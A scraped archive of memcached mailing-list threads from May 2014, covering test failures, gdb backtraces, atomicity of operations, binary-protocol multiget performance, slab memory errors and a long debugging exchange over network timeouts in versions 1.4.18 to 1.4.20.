/lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 4 (Thread 0x766df700 (LWP 8771)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x642ba0) at thread.c:386 ---Type return to continue, or q return to quit--- #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 3 (Thread 0x770e0700 (LWP 8770)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63f810) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 2 (Thread 0x77ae1700 (LWP 8769)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x004197b5 in worker_libevent (arg=0x63c480) at thread.c:386 #4 0x0036dfc079d1 in start_thread () from /lib64/libpthread.so.0 #5 0x0036df8e8b7d in clone () from /lib64/libc.so.6 Thread 1 (Thread 0x77b8d700 (LWP 8766)): #0 0x0036df8e9173 in epoll_wait () from /lib64/libc.so.6 #1 0x77bb47e6 in ?? () from /usr/lib64/libevent-2.0.so.5 #2 0x77ba2c46 in event_base_loop () from /usr/lib64/libevent-2.0.so.5 #3 0x00408a25 in main (argc=value optimized out, argv=value optimized out) at memcached.c:5628 == On Tuesday, 27 May 2014 19:09:56 UTC-7, Dormando wrote: You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r
Re: Memcached 1.4.19 Build Not Working - Compiling from Source
You're completely sure that's the 1.4.20 source tree? That bug was pretty well fixed... If you are definitely testing a 1.4.20 binary, here's the way to grab a trace: start memcached-debug under gdb: gdb ./memcached-debug handle SIGPIPE nostop noprint pass r T_MEMD_USE_DAEMON=127.0.0.1:11211 prove -v t/lru-crawler.t ... wait until it's been spinning cpu for a few seconds. Then ^C the GDB window and run thread apply all bt .. and send me that info. On Tue, 27 May 2014, Alex Gemmell wrote: Hello Dormando, I am having exactly the same issue but with Memcached 1.4.20. My server specs are: RHEL 6 (Linux 2.6.32-358.23.2.el6.x86_64), 1880MB RAM, single core :( Here are the results of me running prove -v t/lru-crawler.t. It took exactly 10m 15s to run before it timed out. I watched htop while it was running and the single CPU sat at 100% (which is to be expected I guess) but the total server memory barely changed and never rose above 330MB. = prove -v t/lru-crawler.t t/lru-crawler.t .. 1..189 ok 1 ok 2 - stored key ok 3 - stored key ok 4 - stored key ok 5 - stored key ok 6 - stored key ok 7 - stored key ok 8 - stored key ok 9 - stored key ok 10 - stored key ok 11 - stored key ok 12 - stored key ok 13 - stored key ok 14 - stored key ok 15 - stored key ok 16 - stored key ok 17 - stored key ok 18 - stored key ok 19 - stored key ok 20 - stored key ok 21 - stored key ok 22 - stored key ok 23 - stored key ok 24 - stored key ok 25 - stored key ok 26 - stored key ok 27 - stored key ok 28 - stored key ok 29 - stored key ok 30 - stored key ok 31 - stored key ok 32 - stored key ok 33 - stored key ok 34 - stored key ok 35 - stored key ok 36 - stored key ok 37 - stored key ok 38 - stored key ok 39 - stored key ok 40 - stored key ok 41 - stored key ok 42 - stored key ok 43 - stored key ok 44 - stored key ok 45 - stored key ok 46 - stored key ok 47 - stored key ok 48 - stored key ok 49 - stored key ok 50 - stored key ok 51 - stored key ok 52 - stored key ok 53 - stored key ok 54 - stored key ok 55 - stored key ok 56 - stored key ok 57 - stored key ok 58 - stored key ok 59 - stored key ok 60 - stored key ok 61 - stored key ok 62 - stored key ok 63 - stored key ok 64 - stored key ok 65 - stored key ok 66 - stored key ok 67 - stored key ok 68 - stored key ok 69 - stored key ok 70 - stored key ok 71 - stored key ok 72 - stored key ok 73 - stored key ok 74 - stored key ok 75 - stored key ok 76 - stored key ok 77 - stored key ok 78 - stored key ok 79 - stored key ok 80 - stored key ok 81 - stored key ok 82 - stored key ok 83 - stored key ok 84 - stored key ok 85 - stored key ok 86 - stored key ok 87 - stored key ok 88 - stored key ok 89 - stored key ok 90 - stored key ok 91 - stored key ok 92 - slab1 has 90 used chunks ok 93 - enabled lru crawler ok 94 ok 95 - kicked lru crawler Timeout.. killing the process Failed 94/189 subtests Test Summary Report --- t/lru-crawler.t (Wstat: 13 Tests: 95 Failed: 0) Non-zero wait status: 13 Parse errors: Bad plan. You planned 189 tests but ran 95. Files=1, Tests=95, 600 wallclock secs ( 0.09 usr 0.01 sys + 352.24 cusr 61.28 csys = 413.62 CPU) Result: FAIL = Any ideas? On Thursday, 1 May 2014 18:28:57 UTC-7, Dormando wrote: What's the output of: $ prove -v t/lru-crawler.t How long are the tests taking to run? This has definitely been tested on ubuntu 12.04 (which is what I assume you meant?), but not something with so little RAM. On Thu, 1 May 2014, Wilfred Khalik wrote: Hi guys, I get the below failure error when I run the make test command: Any help would be appreciated.I am running this on 512MB Digital Ocean VPS by the way on Linux 12.0.4.4 LTS. Slab Stats 64 Thread stats 200 Global stats 208 Settings 124 Item (no cas) 32 Item (cas) 40 Libevent thread 100 Connection 340 libevent thread cumulative 13100 Thread stats cumulative 13000 ./testapp 1..48 ok 1 - cache_create ok 2 - cache_constructor ok 3 - cache_constructor_fail ok 4 - cache_destructor ok 5 - cache_reuse ok 6 - cache_redzone ok 7 - issue_161 ok 8 - strtol ok 9 - strtoll ok 10 - strtoul ok 11 - strtoull ok 12 - issue_44 ok 13 - vperror ok 14 - issue_101 ok 15 - start_server ok 16 - issue_92 ok 17 - issue_102 ok 18 - binary_noop ok 19 - binary_quit ok 20 - binary_quitq ok 21 - binary_set ok 22 - binary_setq ok 23 - binary_add ok 24 - binary_addq ok 25 - binary_replace ok 26 - binary_replaceq ok 27
Re: Memcached read/write consistency
memcached's operations are all atomic. Always have been, always will be, barring bugs. Wouldn't be much useful to anyone if you could have a get come back with half a set... I answer this question a lot and it's pretty bizarre that people think it's how it works. Internally, items are generally immutable (except in one case). If you set a new object in place of an old one, new memory is assigned, the old one is removed from the hash table, and the new one put into it. The old one sticks around so long as anyone is still reading from it, then it is garbage collected (via refcounts). Reads are always consistent and writes don't clobber each other. That would be *insane*. The only exception is incr/decr, which will rewrite the existing item if nobody else is accessing it at the time. If it is being accessed, it allocates new memory as normal. I wonder if I should bump this answer higher up on the wiki somewhere? It's kind of a silly question but it does keep getting asked... On Mon, 12 May 2014, Ezekiel Victor wrote: OK I just noticed that Membase is now Couchbase, but the point remains. Also one of the things we talked about is if the server dies in the middle of a write, what level of protection do you have for the data that would have been written? I guess this discussion would be more about Couchbase at this point. On Monday, May 12, 2014 2:33:29 PM UTC-7, Ezekiel Victor wrote: A coworker and I were having a discussion about whether to use MySQL or memcached for a key-value store. My view is that memcached is designed to be exactly that, and if we desire persistence we can use Membase. He alleged that memcached lacks read/write consistency, such that you can end up reading a half-value if you were to read in the middle of a write. Is this true? I have used memcached under many thousands of reads/writes per second on a high traffic site and never ran into any such problem. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
1.4.20 released
fixes a hang regression seen in .18 and .19. does not affect .17 or newer. no other changes. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Multi-get implementation in binary protocol
Unfortunately binprot isn't that much faster processing wise... what it does give you is a bunch of safe features (batching set's, mixing sets/gets and the like). You *can* reduce the packet load on the server a bit by ensuring your client is actually batching the binary multiget packets together, then it's only the server increasing the packet load... On Fri, 9 May 2014, Byung-chul Hong wrote: Hello, Ryan, dormando, Thanks a lot for the clear explanation and the comments. I'm trying to find out how many requests I can batch as a muli-get within the allowed latency. I think multi-get has many advantages, the only penalty is the longer latency as pointed out in the above answer. But, the longer latency may not be a real issue unless it exceeds some threshold that the end users can notice. So, now I'm trying to use multi-get as much as possible. Actually, I have thought that Binary protocol would be always better than ascii protocol since binary protocol can reduce the burden of parsing in the Server side, but it seems that I need to test both cases. Thanks again for the comments, and I will share the result if I get some interesting or useful data. Byungchul. 2014-05-08 9:30 GMT+09:00 dormando dorma...@rydia.net: Hello, For now, I'm trying to evaluate the performance of memcached server by using several client workloads. I have a question about multi-get implementation in binary protocol. As I know, in ascii protocol, we can send multiple keys in a single request packet to implement multi-get. But, in a binary protocol, it seems that we should send multiple request packets (one request packet per key) to implement multi-get. Even though we send multiple getQ, then sends get for the last key, we only can save the number of response packets only for cache miss. If I understand correctly, multi-get in binary protocol cannot reduce the number of request packets, and it also cannot reduce the number of response packets if hit-ratio is very high (like 99% get hit). If the performance bottleneck is on the network side not on the CPU, I think reducing the number of packets is still very important, but I don't understand why the binary protocol doesn't care about this. I missed something? you're right, it sucks. I was never happy with it, but haven't had time to add adjustments to the protocol for this. To note, with .19 some inefficiencies with the protocol were lifted, and most network cards are fast enough for most situations, even if it's one packet per response (and for large enough responses they split into multiple packets, anyway). The reason why this was done is for latency and streaming of responses: - In ascii multiget, I can send 10,000 keys, then I'm forced to wait for the server to look up all of the keys before sending its responses, this isn't typically very high but there's some latency to it. - In binary multiget, the responses are sent back as it receives them from the network more or less. This reduces the latency to when you start seeing responses, regardless of how large your multiget is. this is useful if you have a kind of client which can start processing responses in a streaming fashion. This potentially reduces the total time to render your response since you can keep the CPU busy unmarshalling responses instead of sleeping. However, it should have some tunables: One where it at least does one write per complete packet (TCP_CORK'ed, or similar), and one where it buffers up to some size. In my tests I can get ascii multiget up to 16.2 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and is spending all of its time calling sendmsg(). Most people need far, far less than that, so the binprot as is should be okay though. The code isn't too friendly to this and there're other higher priority things I'd like to get done sooner. The relatively few number of people who do 500,000+ requests per second in binprot (they're almost always ascii at that scale) is the other reason. -- --- You received this message because you are subscribed to a topic in the Google Groups memcached group. To unsubscribe from this topic, visit https://groups.google.com/d/topic/memcached/QwjEftFhtCY/unsubscribe. To unsubscribe from this group and all its topics, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Can you give me a list (privately, if need be) of a few things: - The exact OS your server is running (centos/redhat release/etc) - The exact kernel version (and where it came from? centos/rh proper or a 3rd party repo?) - Full list of your 3rd party repos, since I know you had some random french thing in there. - Full list of packages installed from 3rd party repos. It is extremely important that all of the software matches. - Hardware details: - Network card(s), speeds - CPU type, number of cores (hyperthreading?) - Amount of RAM - Is this a hardware machine, or a VM somewhere? If a VM, what provider? - memcached stats snapshots again, from your machine after it's been running a while: - stats, stats slabs, stats items, stats settings, stats conns. ^ That's five commands, don't forget any. It's too difficult to try to debug the issue when you hit it. usually when I'm at a gdb console I'm issuing a command every second or two, but it takes us 10 minutes to get through 3-4 commands. It'd be nice if I could attempt to reproduce it here. I went digging more and there're some dup() bugs with epoll, except your libevent is new enough to have those patched.. plus we're not using dup() in such a way to cause the bug. There was also an EPOLL_CTL_MOD race condition in the kernel, but so far as I can tell even with libevent 2.x libevent's not using that feature for us. The issue does smell like the bug that happens with dup()'s - the events keep happening and the fd sits half closed, but again we're never closing those sockets. I can also make a branch with the new dup() calls explicitly removed, but this continues to be obnoxious multi-week-long debugging. I'm convinced that the code in memcached is correct and the bug exists outside of it (libevent or the kernel). There's simply no way for it to hit that code path without closing the socket, and doubly so: epoll automatically delete's an event when the socket is closed. We delete it then close it, and it still comes back. It's not possible a connection ends up in the wrong thread, since both connection initialization and close happens local to a thread. We would need to have a new connection come in with a duplicated fd. If that happens, nothing on your machine would work. thanks. On Thu, 8 May 2014, notificati...@commando.io wrote: I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Why do you say it will be less likely to happen with 2 threads than 4? On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Doesn't tell me anything useful, since I'm already looking for potential races and don't see any possibility outside of libevent. Why do you say it will be less likely to happen with 2 threads than 4? Nature of race conditions: the more threads you have running the more likely you are to hit them, sometimes on order of magnitudes. It doesn't really change the fact that this has worked for many years and the code *barely* changed recently. I just don't see it. On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
To that note, it *is* useful if you try that branch I posted, since so far as I can tell that should emulate the .17 behavior. On Thu, 8 May 2014, dormando wrote: I am just speculating, and by no means have any idea what I am really talking about here. :) With 2 threads, still solid, no timeouts, no runaway 100% cpu. Its been days. Increasing from 2 threads to 4 does not generate any more traffic or requests to memcached. Thus I am speculating perhaps it is a race-condition or some sort, only hitting with 2 threads. Doesn't tell me anything useful, since I'm already looking for potential races and don't see any possibility outside of libevent. Why do you say it will be less likely to happen with 2 threads than 4? Nature of race conditions: the more threads you have running the more likely you are to hit them, sometimes on order of magnitudes. It doesn't really change the fact that this has worked for many years and the code *barely* changed recently. I just don't see it. On Wednesday, May 7, 2014 5:38:47 PM UTC-7, Dormando wrote: That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notifi...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular
Re: MEMCACHED_SERVER_MEMORY_ALLOCATION_FAILURE (SERVER_ERROR out of memory storing object) error
Dormando,Yes, have to admit - we cache too aggressively (just do not want to use different less polite word :)). Going to do two test experiments: enable compression and auto reallocation. Before doing this: 1) why auto reallocation is not enabled by default, what issues/disadvantage to expect? Because it pulls memory from other places and evicts those items regardless of if they were still valid or expired. There's no way for it to reassign slab pages of just expired memory. Some people would prefer to just let evictions fall from the tail (least used) rather than do this, so we didn't change the defaults after introducing the feature. 2) why memcached does not have compression on server side if CPU is idle, because of ideology to keep it simple and fast? (just asking) I said already: in typical use case there are many more clients, and a very high rate of usage. If you flipped where the compression happens the server would run out of CPU very quickly, and be much more latent. We could support it in the server but it'd be a very low priority feature. On Tuesday, May 6, 2014 6:40:07 PM UTC-7, Dormando wrote: Hi Dormando, Full Slabs and Items stats are below. The problem is that other slabs are full too, so rebalancing is not trivial. I will try to create a wrapper that will do some analysis and do slab rebalancing based on stats (the idea to move try to shrink slabs with low eviction but need to think more). But i see there is Slabs Automove in protocol.txt. Do you recommend it? If it fits your needs. Otherwise, write an external daemon that controls the automover based on your own needs. You either need to add more memory to the total system or rebalance them. we run many-many memcached servers with 30Gb+ memory each box. And the problem occurs on some boxes periodically. So I am thinking how to convert manual restart to automatic action. I'm not sure why restarting will fix it, if above you say rebalancing is not trivial. If restarting would fix it, rebalancing would also fix it. From the stats below, you do have a fair amount of memory spread out among the higher order slab classes. Compression, or otherwise re-evaluating how you store those values may make a big difference. There's also a huge amount of stuff being evicted without ever being fetched again. Are you caching too aggressively, or is memory just way too small and they never get a chance to be fetched after being set? I'm just eyeballing it but evicted_time seems pretty short (a matter of hours). That's the last access time of the last object to be evicted... and it's like that across most of your slab classes. So, shuffle and compress and whatnot, but I think you're out of ram dude. server stats STAT pid 15480 STAT uptime 2476264 STAT time 1399422427 STAT version 1.4.15 STAT libevent 1.4.13-stable STAT pointer_size 64 STAT rusage_user 639012.117392 STAT rusage_system 2076810.323840 STAT curr_connections 5237 STAT total_connections 122995977 STAT connection_structures 23402 STAT reserved_fds 40 STAT cmd_get 91928675147 STAT cmd_set 4358475896 STAT cmd_flush 1 STAT cmd_touch 0 STAT get_hits 85005900667 STAT get_misses 6922774480 STAT delete_misses 4238049567 STAT delete_hits 885535057 STAT incr_misses 0 STAT incr_hits 0 STAT decr_misses 0 STAT decr_hits 0 STAT cas_misses 1074 STAT cas_hits 4784930 STAT cas_badval 14966 STAT touch_hits 0 STAT touch_misses 0 STAT auth_cmds 0 STAT auth_errors 0 STAT bytes_read 32317259718167 STAT bytes_written 221039272582722 STAT limit_maxbytes 25769803776 STAT accepting_conns 1 STAT listen_disabled_num 0 STAT threads 8 STAT conn_yields 0 STAT hash_power_level 25 STAT hash_bytes 268435456 STAT hash_is_expanding 0 STAT slab_reassign_running 0 STAT slabs_moved 0 STAT bytes 23567307974 STAT curr_items 32559669 STAT total_items 61290586 STAT expired_unfetched 6664504 STAT evicted_unfetched 1244432758 STAT evictions 2522683859 STAT reclaimed 7626148 END stats slabs STAT 1:chunk_size 96 STAT 1:chunks_per_page 10922 STAT 1:total_pages 1 STAT 1:total_chunks 10922 STAT 1:used_chunks 0 STAT 1:free_chunks 10922 STAT 1:free_chunks_end 0 STAT 1:mem_requested 0 STAT 1:get_hits 9905 STAT 1:cmd_set 10362 STAT 1:delete_hits 9582 STAT 1:incr_hits 0 STAT 1:decr_hits
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notificati...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... either that always happened and we never noticed, or your particular OS is corrupt. There're probably 10,000+ installs of .18+ now and only one complaint, so I'm a little hesitant to spend a ton of time on this until we get more reports. You should downgrade to .17. On Sun, 4 May 2014, notifi...@commando.io wrote: Damn it, got network timeout. CPU 3 is using 100% cpu from memcached. Here is the result of stat to verify using new version of memcached and libevent: STAT version 1.4.19 STAT libevent 2.0.18-stable On Saturday, May 3, 2014 11:55:31 PM UTC-7, notifi...@commando.io wrote: Just upgraded all 5 web-servers to memcached 1.4.19 with libevent 2.0.18. Will advise if I see memcached timeouts. Should be good though. Thanks so much for all the help and patience. Really appreciated. On Friday, May 2, 2014 10:20:26 PM UTC-7, memc...@googlecode.com wrote: Updates: Status: Invalid Comment #20 on issue 363 by dorma...@rydia.net: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout http://code.google.com/p/memcached/issues/detail?id=363 Any repeat crashes? I'm going to close this. it looks like remi shipped .19. reopen or open a new one if it hangs in the same way somehow... Well. 19 won't be printing anything, and it won't hang, but if it's actually our bug and not libevent it would end up spinning CPU. Keep an eye out I guess. -- You received this message because this project is configured to send all issue notifications to this address. You may adjust your notification preferences at: https://code.google.com/hosting/settings -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving
Re: Multi-get implementation in binary protocol
Hello, For now, I'm trying to evaluate the performance of memcached server by using several client workloads. I have a question about multi-get implementation in binary protocol. As I know, in ascii protocol, we can send multiple keys in a single request packet to implement multi-get. But, in a binary protocol, it seems that we should send multiple request packets (one request packet per key) to implement multi-get. Even though we send multiple getQ, then sends get for the last key, we only can save the number of response packets only for cache miss. If I understand correctly, multi-get in binary protocol cannot reduce the number of request packets, and it also cannot reduce the number of response packets if hit-ratio is very high (like 99% get hit). If the performance bottleneck is on the network side not on the CPU, I think reducing the number of packets is still very important, but I don't understand why the binary protocol doesn't care about this. I missed something? you're right, it sucks. I was never happy with it, but haven't had time to add adjustments to the protocol for this. To note, with .19 some inefficiencies with the protocol were lifted, and most network cards are fast enough for most situations, even if it's one packet per response (and for large enough responses they split into multiple packets, anyway). The reason why this was done is for latency and streaming of responses: - In ascii multiget, I can send 10,000 keys, then I'm forced to wait for the server to look up all of the keys before sending its responses, this isn't typically very high but there's some latency to it. - In binary multiget, the responses are sent back as it receives them from the network more or less. This reduces the latency to when you start seeing responses, regardless of how large your multiget is. this is useful if you have a kind of client which can start processing responses in a streaming fashion. This potentially reduces the total time to render your response since you can keep the CPU busy unmarshalling responses instead of sleeping. However, it should have some tunables: One where it at least does one write per complete packet (TCP_CORK'ed, or similar), and one where it buffers up to some size. In my tests I can get ascii multiget up to 16.2 million keys/sec, but (with the fixes in .19) binprot caps out at 4.6m and is spending all of its time calling sendmsg(). Most people need far, far less than that, so the binprot as is should be okay though. The code isn't too friendly to this and there're other higher priority things I'd like to get done sooner. The relatively few number of people who do 500,000+ requests per second in binprot (they're almost always ascii at that scale) is the other reason. -- --- You received this message because you are subscribed to the Google Groups memcached group. To unsubscribe from this group and stop receiving emails from it, send an email to memcached+unsubscr...@googlegroups.com. For more options, visit https://groups.google.com/d/optout.
Re: Issue 363 in memcached: MemcachePool::get(): Server 127.0.0.1 (tcp 11211, udp 0) failed with: Network timeout
That doesn't really tell us anything about the nature of the problem though. With 2 threads it might still happen, but is a lot less likely. On Wed, 7 May 2014, notificati...@commando.io wrote: Bumped up to 2 threads and so far no timeout errors. I'm going to let it run for a few more days, then revert back to 4 threads and see if timeout errors come up again. That will tell us the problem lies in spawning more than 2 threads. On Wednesday, May 7, 2014 5:19:13 PM UTC-7, Dormando wrote: Hey, try this branch: https://github.com/dormando/memcached/tree/double_close so far as I can tell that emulates the behavior in .17... to build: ./autogen.sh ./configure make run it in screen like you were doing with the other tests, see if it prints ERROR: Double Close [somefd]. If it prints that once then stops, I guess that's what .17 was doing... if it print spams, then something else may have changed. I'm mostly convinced something about your OS or build is corrupt, but I have no idea what it is. The only other thing I can think of is to instrument .17 a bit more and have you try that (with the connection code laid out the old way, but with a conn_closed flag to detect a double close attempt), and see if the old .17 still did it. On Tue, 6 May 2014, notifi...@commando.io wrote: Changing from 4 threads to 1 seems to have resolved the problem. No timeouts since. Should I set to 2 threads and wait and see how things go? On Tuesday, May 6, 2014 12:07:08 AM UTC-7, Dormando wrote: and how'd that work out? Still no other reports :/ a few thousand more downloads of .19... On Sun, 4 May 2014, notifi...@commando.io wrote: I'm going to try switching threads from 4 to 1. This host web2 is on the only one I am seeing it on, but it also is the only hosts that gets any real traffic. Super frustrating. On Sunday, May 4, 2014 10:12:08 AM UTC-7, Dormando wrote: I'm stumped. (also, your e-mails aren't updating the ticket...). It's impossible for a connection to get into the closed state without having event_del() and close() called on the socket. A socket slot isn't event_add()'ed again until after the state is reset to 'init_state'. There was no code path for event_del to actually fail so far as I could see. I've e-mailed steven grimm for ideas but either that's not his e-mail anymore or he's not going to respond. I really don't know. I guess the old code would've just called conn_close again by accident... I don't see how the logic changed in any significant way in .18. Though again, if it happened with any frequency people's curr_conns stat would go negative. So... 